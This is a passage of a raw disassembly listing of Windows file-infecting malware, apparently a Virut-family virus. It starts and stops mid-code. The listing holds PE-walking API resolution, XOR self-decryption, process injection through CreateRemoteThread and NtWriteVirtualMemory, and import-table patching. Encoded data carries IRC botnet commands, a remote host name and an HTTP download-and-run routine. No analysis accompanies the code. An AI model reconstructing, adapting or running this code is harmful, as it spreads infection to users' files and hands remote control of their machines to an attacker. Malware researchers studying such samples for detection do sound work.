ja short loc_40A232
pop ebx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp ebx
sub_40A217 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A253 proc near ; CODE XREF: sub_40A217+A�p
pop ebx
jmp ebx
sub_40A253 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A256 proc near ; CODE XREF: seg002:0040A208�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_40A256 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_40A2AF
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_40A2A6
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_40A2AE
; ---------------------------------------------------------------------------
loc_40A2A6: ; CODE XREF: seg002:0040A297�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_40A2AE: ; CODE XREF: seg002:0040A2A4�j
pop ebx
loc_40A2AF: ; CODE XREF: seg002:0040A280�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 1209h
and ebx, 0FFFFF000h
sub ebp, offset loc_401006
mov edi, [esp+4]
lea esi, dword_40343C[ebp]
mov ecx, 0
rep movsb
loc_40A2D6: ; CODE XREF: seg002:0040A2F2�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_40A2EC
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_40A2F4
loc_40A2EC: ; CODE XREF: seg002:0040A2DD�j
sub ebx, 100h
jnz short loc_40A2D6
loc_40A2F4: ; CODE XREF: seg002:0040A2EA�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_40A302: ; CODE XREF: seg002:loc_40A329�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_40A329
cmp dword ptr [eax+3], 636F7250h
jnz short loc_40A329
cmp dword ptr [eax+7], 72646441h
jnz short loc_40A329
cmp dword ptr [eax+0Bh], 737365h
jz short loc_40A32E
loc_40A329: ; CODE XREF: seg002:0040A30C�j
; seg002:0040A315�j ...
loop loc_40A302
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40A32E: ; CODE XREF: seg002:0040A327�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_40A354+2
inc ebx
insb
outsd
jnb short near ptr loc_40A3B2+2
dec eax
popa
outsb
db 64h
insb
loc_40A354: ; CODE XREF: seg002:0040A345�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_40A370+1
inc ebx
jb short near ptr loc_40A3CB+1
popa
jz short near ptr loc_40A3CB+4
inc ebp
jbe short near ptr loc_40A3D1+1
outsb
jz short near ptr loc_40A3AF+2
loc_40A370: ; CODE XREF: seg002:0040A35F�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_40A38C
inc edi
db 65h
jz short near ptr loc_40A3CB+4
popa
jnb short loc_40A3FA
inc ebp
jb short near ptr loc_40A3FA+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_40A38C proc near ; CODE XREF: seg002:0040A37A�p
; FUNCTION CHUNK AT 0040A435 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 0040A575 SIZE 0000013A BYTES
push ebx
call esi ; CloseServiceHandle
mov [ebp+403544h], eax
call sub_40A40A
test eax, eax
jz short loc_40A3BF
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_40A3B9
lea eax, [ebp+4011D2h]
loc_40A3AF: ; CODE XREF: seg002:0040A36E�j
mov dl, [eax-1]
loc_40A3B2: ; CODE XREF: seg002:0040A34D�j
call sub_40A425
jmp short loc_40A435
; ---------------------------------------------------------------------------
loc_40A3B9: ; CODE XREF: sub_40A38C+1B�j
; sub_40A38C+136�j ...
call dword ptr [ebp+40353Ch]
loc_40A3BF: ; CODE XREF: sub_40A38C+10�j
test ss:dword_403431[ebp], 80000000h
jz short loc_40A3E9
loc_40A3CB: ; CODE XREF: seg002:0040A365�j
; seg002:0040A368�j ...
lea esi, dword_403435[ebp]
loc_40A3D1: ; CODE XREF: seg002:0040A36B�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_40A3E9: ; CODE XREF: sub_40A38C+3D�j
pop ebp
retn
sub_40A38C endp
; ---------------------------------------------------------------------------
loc_40A3EB: ; CODE XREF: sub_40A40A+2�p
; sub_40A38C:loc_40A5F4�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_40A3FA: ; CODE XREF: seg002:0040A384�j
; seg002:0040A387�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 2
; =============== S U B R O U T I N E =======================================
sub_40A40A proc near ; CODE XREF: sub_40A38C+9�p
xor ecx, ecx
call loc_40A3EB
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_40A40A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A425 proc near ; CODE XREF: sub_40A38C:loc_40A3B2�p
; sub_40C1F9+25B�p
mov dh, dl
mov ecx, 225Fh
loc_40A42C: ; CODE XREF: sub_40A425+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_40A42C
retn
sub_40A425 endp
; ---------------------------------------------------------------------------
db 0Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A38C
loc_40A435: ; CODE XREF: sub_40A38C+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, ss:dword_403431[ebp]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_40A45C: ; CODE XREF: sub_40A38C+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_40A45C
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, loc_4015BB[ebp]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_40A7EF
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_40A575
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_40A3B9
xchg eax, edi
lea esi, sub_401000[ebp]
mov ebp, edi
mov ecx, 0A74h
sub ebp, offset sub_401000
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_40A38C
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, loc_401A3D[ebp]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_40A3B9
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_40A3B9
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_40A565
jmp loc_40A3B9
; =============== S U B R O U T I N E =======================================
sub_40A565 proc near ; CODE XREF: seg002:0040A55B�p
; sub_40A565+D�j
push 1
pop ecx
jecxz short locret_40A574
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_40A565
; ---------------------------------------------------------------------------
locret_40A574: ; CODE XREF: sub_40A565+3�j
retn
sub_40A565 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A38C
loc_40A575: ; CODE XREF: sub_40A38C+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_40A3B9
call near ptr loc_40A58C+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_40A58C: ; CODE XREF: sub_40A38C+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_40A5A9+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_40A7EF
loc_40A5A9: ; CODE XREF: sub_40A38C+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_40A3B9
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_40A5F4
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_40A5F4: ; CODE XREF: sub_40A38C+25D�j
call loc_40A3EB
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_40A639: ; CODE XREF: sub_40A38C+2B0�j
lodsb
stosw
loop loc_40A639
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_40A3B9
lea esi, sub_401000[ebp]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, offset sub_401000
lea eax, loc_40144C[ebp]
jmp eax
; END OF FUNCTION CHUNK FOR sub_40A38C
; ---------------------------------------------------------------------------
db 8Dh
db 95h ; •
dd offset loc_4018DC+4
db 52h, 0FFh, 95h
dd offset dword_403440+15Ch
db 0E8h ; è
db 16h, 2 dup(0)
db 0
aLookupprivileg db 'LookupPrivilegeValueA',0
db 50h
dd 354895FFh, 85890040h, 40354Ch, 206A5450h, 95FFFF6Ah
dd 4035ECh, 755FC085h, 26A963Fh, 0D48B5656h, 0E852016Ah
dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 95FF5600h
dd 40354Ch, 5656C48Bh, 57565056h, 35D095FFh, 0C4830040h
dd 95FF5710h, 40353Ch, 26A006Ah, 357095FFh, 28B90040h
dd 97000001h, 0C89E12Bh, 0FF575424h, 4035AC95h, 83F63300h
dd 40363CA5h, 57540000h, 35B095FFh, 0C0850040h, 83465C74h
dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 35A895FFh, 0C0850040h
dd 0E893DC74h, 43Dh, 0E391C933h, 3C853930h, 75004036h
dd 0AEC18128h, 5000000Dh, 51565054h, 0FF535050h, 40356895h
dd 59C08500h, 74FF0F74h, 858F0824h, 40363Ch, 0FFFDACE8h
dd 95FF53FFh, 40353Ch, 0C48198EBh, 128h, 3C95FF57h, 0E9004035h
dd 0FFFFFBE5h, 5800498Dh, 0CE005858h, 65000029h, 0Dh, 2 dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_40A7EF proc near ; CODE XREF: sub_40A38C+100�p
; sub_40A38C+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_40A7FA: ; CODE XREF: sub_40A7EF+E�j
lodsb
test al, al
jnz short loc_40A7FA
loop sub_40A7EF
retn
sub_40A7EF endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya_0 db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey_0 db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_40AB8A proc near ; CODE XREF: seg002:0040AC31�p
; seg002:0040AC42�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_40AB8A endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_40AC6D
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_40AC6D
mov ecx, [ebp+401588h]
jecxz short loc_40AC25
lea edx, sub_401000[ebp]
add edx, ecx
push edi
push ebx
call edx
loc_40AC25: ; CODE XREF: seg002:0040AC17�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_40AB8A
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_40AB8A
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_40AB8A
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_40AC6D
lea ecx, [edi+23F5h]
call sub_40AB8A
loc_40AC6D: ; CODE XREF: seg002:0040ABD7�j
; seg002:0040AC0F�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401A43EDh, 8DFF6A00h, 401A0E95h
dd 0CD525000h, 2A002420h, 0CC48300h, 5485C766h, 0CD00401Ah
dd 5685C720h, 2400401Ah, 5D002A00h, 6A016AC3h, 0FF33FF01h
dd 15FF0473h, 0F074C085h, 0B68h, 5BD08B00h, 8D3C5003h
dd 401A72B5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C783C2EBh, 0D48B570Fh
dd 50CC8B53h, 51406A54h, 0FFFF6A52h, 4035F095h, 0CC48300h
dd 3574958Bh, 0D72B0040h, 0C707EA83h, 0E8006A07h, 3578900h
dd 581A6AC3h, 9E8h, 61428D00h, 75C9FEAAh
db 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_40AD52 proc near ; CODE XREF: sub_40B5BD+1B�p
; sub_40B735+3�p ...
imul edx, ss:dword_403646[ebp], 8088405h
inc edx
mov ss:dword_403646[ebp], edx
mul edx
retn
sub_40AD52 endp
; ---------------------------------------------------------------------------
dw 0E855h
dd 0
dd 9ED815Dh, 8B00401Bh, 40364A9Dh, 247C8300h, 840F0008h
dd 0B9h, 208EC81h, 68540000h, 104h, 359095FFh, 0FC8B0040h
dd 424848Dh, 50000001h, 4E8006Ah, 56000000h, 57005452h
dd 358C95FFh, 0C9330040h, 104978Dh, 51510000h, 6A51026Ah
dd 6801h, 0FF524000h, 40355C95h, 0F6859600h, 54505B74h
dd 10468h, 0B4FF5700h, 22024h, 2895FF00h, 59004036h, 1674C085h
dd 8B5014E3h, 52006AD4h, 0FF565751h, 4035CC95h, 0C0855900h
dd 0FF56D075h, 40353C95h, 44578D00h, 446A5752h, 4978D58h
dd 0AB000001h, 106AC033h, 50ABF359h, 50505050h, 0FF525050h
dd 40356495h, 8C48100h, 0FF000002h, 0FF082474h, 40361895h
dd 95FF5300h, 403618h, 4C25Dh, 750A3E80h, 8D8B4601h, 401584h
dd 958D19E3h, 401000h, 0FF56D103h, 0FC084D2h, 11F88h, 10840F00h
dd 80000001h, 10753A3Eh, 3E8046h, 101840Fh, 3E800000h
dd 46F17520h, 49503E81h, 4275474Eh, 46C6CF8Bh, 0CE2B4F01h
dd 51006A51h, 95FF5356h, 403610h, 0FC13B59h, 0DF85h, 0A2858D00h
dd 6A00401Dh, 0C6800h, 53500000h, 361095FFh, 0C3D0040h
dd 0F000000h, 0BF85h, 0B1E900h, 3E810000h, 56495250h, 0A5850Fh
dd 0C6830000h, 0D3CAC08h, 99840Fh, 203C0000h, 3CACF375h
dd 8C850F3Ah, 0AD000000h, 2020200Dh, 67213D20h, 7F757465h
dd 75203CACh, 0FF7E817Ch, 74746820h, 7E817175h, 2F3A7003h
dd 0C668752Fh, 0F00FF47h, 2710BA31h, 0E2F70000h, 0BC95FF52h
dd 33004035h, 505050C0h, 9E850h, 6F440000h, 6F6C6E77h
dd 0FF006461h, 40362095h, 74C08500h, 89C93336h, 40364A85h
dd 685100h, 51800002h, 0FF505651h, 40362495h, 3958D00h
dd 5000401Bh, 5154C933h, 51515250h, 356C95FFh, 4870040h
dd 3C95FF24h, 0F8004035h, 778D80C3h, 1004015h, 4F53C3F9h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 0F0FF0002h, 100007Fh, 786F7270h, 692E6D69h, 61676372h
dd 7978616Ch, 6C702Eh, 4B43494Eh, 7A726D20h, 7A727374h
dd 53550A71h, 79205245h, 35303230h, 2E203130h, 3A202E20h
dd 494F4A2Dh, 7626204Eh, 75747269h, 0E8550Ah, 5D000000h
dd 1DB4ED81h, 85C60040h, 401577h, 9495FF00h, 0C1004035h
dd 3C741FE8h, 0B58B1E6Ah, 403550h, 2E3CAC59h, 81662A75h
dd 751DFF3Eh, 40BD8D23h, 8B004036h, 0A5570276h, 858DA566h
dd 40336Ah, 3390858Fh, 89FA0040h, 4E8CFA46h, 1B1FBFEh
dd 43EBCFE2h, 15B1858Dh, 6A500040h, 0FF0E6A00h, 4035A495h
dd 247C8300h, 2B750408h, 4E8h, 43465300h, 8895FF00h, 0E8004035h
dd 0FFFFFC48h, 7E8h, 43465300h, 534F5Fh, 358895FFh, 31E80040h
dd 0E8FFFFFCh, 0FFFFF356h, 13038DFFh, 0BE80040h, 55000000h
dd 33524553h, 4C442E32h, 95FF004Ch, 40359Ch, 0AE8h, 70737700h
dd 746E6972h, 50004166h, 354895FFh, 85890040h, 403554h
dd 8D8D310Fh, 4018E0h, 36468589h, 0FF510040h, 40359C95h
dd 4689300h, 8D000000h, 4018EDB5h, 0BD8D5900h, 40362Ch
dd 0FFF6D6E8h, 85C766FFh, 401D67h, 0A583F0FFh, 401D69h
dd 27958D00h, 5000401Dh, 6A016A54h, 2685200h, 0FF800000h
dd 40363095h, 5AC08500h, 8D8D2275h, 401D5Ah, 8D066A52h
dd 401D67B5h, 50565400h, 0FF525150h, 40363495h, 95FF5800h
dd 40362Ch, 384D85C6h, 0E8000040h, 0Ch, 434F5357h, 2E32334Bh
dd 4C4C44h, 359C95FFh, 68930040h, 7, 1844B58Dh, 8D590040h
dd 4035FCBDh, 0F651E800h, 0CE8FFFFh, 57000000h, 4E494E49h
dd 442E5445h, 0FF004C4Ch, 40359C95h, 0FC08500h, 1E784h
dd 5689300h, 8D000000h, 401882B5h, 0BD8D5900h, 403618h
dd 0FFF61AE8h, 1CBD83FFh, 4036h, 1C2840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 4035FCh, 190C481h, 8B500000h
dd 52006AD4h, 361C95FFh, 0C0850040h, 680D7559h, 1388h
dd 35BC95FFh, 0E2EB0040h, 1D69BD83h, 75000040h, 6D858D29h
dd 5000401Dh, 360895FFh, 0C0850040h, 13B840Fh, 408B0000h
dd 0FF008B0Ch, 69858F30h, 0C600401Dh, 40384D85h, 6A0100h
dd 26A016Ah, 361495FFh, 0F8830040h, 12840FFFh, 93000001h
dd 1D65958Dh, 106A0040h, 95FF5352h, 403604h, 850FC085h
dd 0F2h, 1D86BD8Dh, 8B10040h, 0FFFABCE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 9895FF54h, 8D004035h, 401D94BDh, 0E801B100h
dd 0FFFFFA9Dh, 1024448Bh, 0B08E0C1h, 0C1042444h, 440B08E0h
dd 0E8500824h, 5, 78362E25h, 95FF5700h, 403554h, 0C60CC483h
dd 8D200647h, 401D8195h, 68006A00h, 21h, 95FF5352h, 403610h
dd 14247C8Dh, 5895FF57h, 0C6004035h, 400A3804h, 5750006Ah
dd 1095FF53h, 3004036h, 0A2BD8DE6h, 6A00401Dh, 0C6800h
dd 53570000h, 361095FFh, 0C3D0040h, 75000000h, 4EB58D4Dh
dd 8D004036h, 40384D8Dh, 6ACE2B00h, 53565100h, 360C95FFh
dd 0F8830040h, 912F7E00h, 0B58DFE8Bh, 40364Eh, 0AEF20DB0h
dd 0E8601075h, 0FFFFFAF8h, 0E3177261h, 1778D09h, 0CF8BEAEBh
dd 0BD8DCE2Bh, 40364Eh, 0F787A4F3h, 0FF53B9EBh, 40360095h
dd 77BD8000h, 1004015h, 30682A74h, 0FF000075h, 4035BC95h
dd 4DBD8000h, 4038h, 85C71174h, 401D69h, 0
dd 384D85C6h, 0E9000040h, 0FFFFFE56h, 158085C7h, 40h, 0C25D8000h
dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h
dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h
dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h
dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h
dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h
dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h
dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h
dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h
dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h
dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h
dd 49202165h, 20732774h, 6574616Ch, 290A0D21h, 0E510A614h
dd 1327B1FAh, 4810A614h, 4403752h, 0ED30C784h, 474FD479h
dd 576299ADh, 6A3AAB59h, 7E606EF9h, 5C1A73C1h, 52C26CCCh
dd 0D8B8B3h, 13h dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_40B507 proc near ; CODE XREF: sub_40B54E:loc_40B5AB�p
; sub_40B60E+7�p ...
arg_0 = dword ptr 4
pusha
and ss:dword_4039A6[ebp], 0
and ss:dword_4039AA[ebp], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_40B523: ; CODE XREF: sub_40B507+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_40B545
cmp eax, [edx+8]
jnb short loc_40B545
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov ss:dword_4039A6[ebp], edx
mov ss:dword_4039AA[ebp], eax
jmp short loc_40B54A
; ---------------------------------------------------------------------------
loc_40B545: ; CODE XREF: sub_40B507+23�j
; sub_40B507+28�j
add edx, 28h
loop loc_40B523
loc_40B54A: ; CODE XREF: sub_40B507+3C�j
popa
retn 4
sub_40B507 endp
; =============== S U B R O U T I N E =======================================
sub_40B54E proc near ; CODE XREF: seg002:0040B87A�p
; seg002:0040B8A0�p
mov byte ptr ss:loc_4022F7[ebp], al
call sub_40B5BD
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_40B565: ; CODE XREF: sub_40B54E+1E�j
cmp [eax], ebx
jz short loc_40B575
add eax, 4
loop loc_40B565
inc ss:dword_40398E[ebp]
retn
; ---------------------------------------------------------------------------
loc_40B575: ; CODE XREF: sub_40B54E+19�j
neg ecx
add ecx, dword ptr ss:loc_4022F7[ebp]
jecxz short loc_40B58F
loc_40B57F: ; CODE XREF: sub_40B54E+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_40B57F
mov [ebp+402224h], ebx
loc_40B58F: ; CODE XREF: sub_40B54E+2F�j
; sub_40B5BD+34�j
cmp dword ptr [edx], 0
jz short loc_40B599
sub esi, [edx]
add esi, [edx+10h]
loc_40B599: ; CODE XREF: sub_40B54E+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_40B5A8
push dword ptr [edx]
jmp short loc_40B5AB
; ---------------------------------------------------------------------------
loc_40B5A8: ; CODE XREF: sub_40B54E+54�j
push dword ptr [edx+10h]
loc_40B5AB: ; CODE XREF: sub_40B54E+58�j
call sub_40B507
sub ecx, esi
sub ecx, ss:dword_4039AA[ebp]
pop eax
add ecx, [ebx+34h]
retn
sub_40B54E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B5BD proc near ; CODE XREF: sub_40B54E+6�p
pop ss:dword_403992[ebp]
mov ss:dword_40398E[ebp], 0
call sub_40B60E
mov eax, ss:dword_40398E[ebp]
call sub_40AD52
call sub_40B5FA
cmp ss:dword_40398E[ebp], 0
jnz short loc_40B5F3
mov dword ptr ss:sub_4022A0[ebp], ebx
jmp short loc_40B58F
; ---------------------------------------------------------------------------
loc_40B5F3: ; CODE XREF: sub_40B5BD+2C�j
dec ss:dword_40398E[ebp]
retn
sub_40B5BD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B5FA proc near ; CODE XREF: sub_40B5BD+20�p
pop ss:dword_403992[ebp]
mov ss:dword_40398E[ebp], edx
call sub_40B60E
xor ecx, ecx
retn
sub_40B5FA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B60E proc near ; CODE XREF: sub_40B5BD+10�p
; sub_40B5FA+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_40B507
add edx, ss:dword_4039AA[ebp]
add edx, esi
loc_40B622: ; CODE XREF: sub_40B60E+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_40B733
cmp dword ptr [edx+10h], 0
jz locret_40B733
mov eax, [edx+0Ch]
push eax
call sub_40B507
add eax, ss:dword_4039AA[ebp]
add eax, esi
push eax
loc_40B648: ; CODE XREF: sub_40B60E+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_40B668
cmp cl, 2Eh
jz short loc_40B657
loc_40B654: ; CODE XREF: sub_40B60E+58�j
inc eax
jmp short loc_40B648
; ---------------------------------------------------------------------------
loc_40B657: ; CODE XREF: sub_40B60E+44�j
